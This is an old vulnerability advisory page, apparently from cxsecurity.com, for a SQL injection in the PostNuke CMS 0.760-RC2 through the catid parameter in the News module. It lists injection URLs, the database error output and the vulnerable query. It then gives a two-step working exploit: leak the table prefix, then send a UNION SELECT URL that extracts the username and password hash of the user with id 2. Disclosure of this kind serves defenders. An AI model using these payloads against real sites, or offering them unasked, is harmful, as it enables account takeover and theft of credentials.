PostNuke Critical SQL Injection 0.760-RC2=>x

2005.09.30
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[PostNuke Critical SQL Injection 0.760-RC2=>x cXIb8O3.1] Author: Maksymilian Arciemowicz Date: 15.2.2005 - --- 0.Description --- PostNuke: The Phoenix Release (0.760-RC2=>x) PostNuke is an open source, open developement content management system (CMS). PostNuke started as a fork from PHPNuke (http://www.phpnuke.org) and provides many enhancements and improvements over the PHP-Nuke system. PostNuke is still undergoing development but a large number of core functions are now stabilising and a complete API for third-party developers is now in place. If you would like to help develop this software, please visit our homepage at http://noc.postnuke.com/ You can also visit us on our IRC Server irc.postnuke.com channel #postnuke-support #postnuke-chat #postnuke Or at the Community Forums located at: http://forums.postnuke.com/ - --- 1. Critical SQL INJECTION --- This SQL INJECTION is in modules/News/funcs.php in function getArticles(). When this function is active(Other Stories), we can add sql querty in varible catid. For exemple: http://[HOST]/[DIR]/index.php?catid='cXIb8O3 Error message : - --------------- DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''cXIb8O3 ORDER BY pn_stories.pn_time DESC LIMIT 10,10' at line 23 - --------------- http://[HOST]/[DIR]/modules.php?op=modload&name=News&file=article&sid=1&catid='cXIb8O3 Error message : - --------------- DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''cXIb8O3 ORDER BY pn_stories.pn_time DESC LIMIT 10,10' at line 23 - --------------- http://[HOST]/[DIR]/admin.php?module=NS-AddStory&op=EditCategory&catid='cXIb8O3 Error message : - --------------- DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''cXIb8O3 ORDER BY pn_stories.pn_time DESC LIMIT 10,10' at line 23 - --------------- etc. and varible $query is: - --------------- SELECT pn__stories.pn_aid AS "aid", pn__stories.pn_bodytext AS "bodytext", pn__stories_cat.pn_themeoverride AS "catthemeoverride", pn__stories.pn_catid AS "cid", pn__stories_cat.pn_title AS "cattitle", pn__stories.pn_comments AS "comments", pn__stories.pn_counter AS "counter", pn__stories.pn_hometext AS "hometext", pn__stories.pn_informant AS "informant", pn__stories.pn_notes AS "notes", pn__stories.pn_sid AS "sid", pn__stories.pn_themeoverride AS "themeoverride", pn__topics.pn_topicid AS "tid", pn__stories.pn_time AS "time", pn__stories.pn_title AS "title", pn__topics.pn_topicname AS "topicname", pn__topics.pn_topicimage AS "topicimage", pn__topics.pn_topictext AS "topictext", pn__topics.pn_counter AS "tcounter", pn__stories.pn_time AS "unixtime", pn__stories.pn_withcomm AS "withcomm" FROM pn__stories LEFT JOIN pn__stories_cat ON pn__stories.pn_catid = pn__stories_cat.pn_catid LEFT JOIN pn__topics ON pn__stories.pn_topic = pn__topics.pn_topicid WHERE (pn__stories.pn_language ='eng' OR pn__stories.pn_language='') AND pn__stories.pn_catid='cXIb8O3 ORDER BY pn__stories.pn_time DESC - --------------- Exploit: This exploit get password from user with id=2. But frist check prefix. Step 1. http://[HOST]/[DIR]/index.php?catid='cXIb8O3 Error message : - --------------- DB Error: getArticles: 1064: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ''cXIb8O3 ORDER BY pn_stories.pn_time DESC LIMIT 10,10' at line 23 - --------------- and pn_ is that prefix. Step 2. http://[HOST]/[DIR]/modules.php?op=modload&name=NS-Polls&file=index&req=results&pollID=2&mode=thread &order=0&thold=0&catid=-99999%20UNION%20SELECT%20pn_uname,pn_uname,pn_uname,pn_uname,pn_uname,null,null,null ,pn_uname,pn_uname,pn_uname,pn_uname,pn_uname,null,pn_pass,null,null,null,null,null,null%20FROM%20[$PREFIX]users%20WHERE %20pn_uid=2/* - --- 2. How to fix --- Download the new version of the script or update. - --- 3.Contact --- Author: Maksymilian Arciemowicz


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top